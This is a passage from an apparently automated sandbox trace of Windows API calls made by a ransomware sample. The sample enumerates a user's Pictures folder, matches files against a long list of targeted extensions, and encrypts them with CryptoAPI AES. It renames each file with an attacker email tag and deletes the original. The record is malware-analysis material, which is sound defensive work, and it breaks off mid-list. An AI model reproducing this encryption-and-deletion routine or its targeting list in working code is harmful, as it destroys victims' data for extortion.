	[0195.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.784] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1160*, pdwDataLen=0x18bc0c*=0x3fd6, dwBufLen=0x3fe0 | out: pbData=0xfe1160*, pdwDataLen=0x18bc0c*=0x3fe0) returned 1
	[0195.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.784] CryptDestroyKey (hKey=0xfb9b30) returned 1
	[0195.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.784] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0195.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.785] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0195.785] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.785] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.786] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.787] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 97
	[0195.787] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.790] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe1160*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe1160*, lpNumberOfBytesWritten=0x18c068*=0x3fe0, lpOverlapped=0x0) returned 1
	[0195.794] CloseHandle (hObject=0x2c0) returned 1
	[0195.795] CloseHandle (hObject=0x384) returned 1
	[0195.795] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png")) returned 1
	[0195.800] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png")) returned 0
	[0195.800] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0df0180, ftCreationTime.dwHighDateTime=0x1d96b76, ftLastAccessTime.dwLowDateTime=0xda1df870, ftLastAccessTime.dwHighDateTime=0x1d96ce8, ftLastWriteTime.dwLowDateTime=0xda1df870, ftLastWriteTime.dwHighDateTime=0x1d96ce8, nFileSizeHigh=0x0, nFileSizeLow=0x12c55, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LNY0-ulI.jpg", cAlternateFileName="")) returned 1
	[0195.800] lstrcmpW (lpString1="LNY0-ulI.jpg", lpString2="..") returned 1
	[0195.800] lstrcmpW (lpString1="LNY0-ulI.jpg", lpString2=".") returned 1
	[0195.800] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.801] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="LNY0-ulI.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\LNY0-ulI.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\LNY0-ulI.jpg"
	[0195.801] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\LNY0-ulI.jpg") returned 43
	[0195.801] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.801] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\LNY0-ulI.jpg", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg") returned 0x2b
	[0195.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.801] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.801] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg"
	[0195.802] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg") returned 43
	[0195.802] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.802] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0195.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.802] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.802] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.803] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.803] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.808] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x12c55, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x12c55, lpOverlapped=0x0) returned 1
	[0195.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.812] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb770) returned 1
	[0195.814] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.814] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.814] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.814] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.814] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.814] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0195.815] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.815] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x12c55, dwBufLen=0x12c55 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x12c60) returned 1
	[0195.817] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.817] RtlMoveMemory (in: Destination=0xfefde0, Source=0xfdd180, Length=0x12c55 | out: Destination=0xfefde0) 
	[0195.817] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.817] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfefde0*, pdwDataLen=0x18bc0c*=0x12c55, dwBufLen=0x12c60 | out: pbData=0xfefde0*, pdwDataLen=0x18bc0c*=0x12c60) returned 1
	[0195.819] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.819] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0195.819] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.820] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0195.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.820] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0195.820] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.820] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.821] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.822] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 85
	[0195.822] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.824] WriteFile (in: hFile=0x2c0, lpBuffer=0xfefde0*, nNumberOfBytesToWrite=0x12c60, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfefde0*, lpNumberOfBytesWritten=0x18c068*=0x12c60, lpOverlapped=0x0) returned 1
	[0195.829] CloseHandle (hObject=0x2c0) returned 1
	[0195.829] CloseHandle (hObject=0x384) returned 1
	[0195.830] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg")) returned 1
	[0195.889] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\lny0-uli.jpg")) returned 0
	[0195.889] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x813bb4d0, ftCreationTime.dwHighDateTime=0x1d96c44, ftLastAccessTime.dwLowDateTime=0x2051f930, ftLastAccessTime.dwHighDateTime=0x1d970cd, ftLastWriteTime.dwLowDateTime=0x2051f930, ftLastWriteTime.dwHighDateTime=0x1d970cd, nFileSizeHigh=0x0, nFileSizeLow=0x38a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NaKuksj-6.png", cAlternateFileName="NAKUKS~1.PNG")) returned 1
	[0195.889] lstrcmpW (lpString1="NaKuksj-6.png", lpString2="..") returned 1
	[0195.889] lstrcmpW (lpString1="NaKuksj-6.png", lpString2=".") returned 1
	[0195.889] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.890] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="NaKuksj-6.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\NaKuksj-6.png") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\NaKuksj-6.png"
	[0195.890] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\NaKuksj-6.png") returned 44
	[0195.890] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.890] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\NaKuksj-6.png", cchLength=0x2c | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png") returned 0x2c
	[0195.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.890] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.890] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png") returned="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png"
	[0195.891] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png") returned 44
	[0195.891] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.891] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0195.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.891] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.a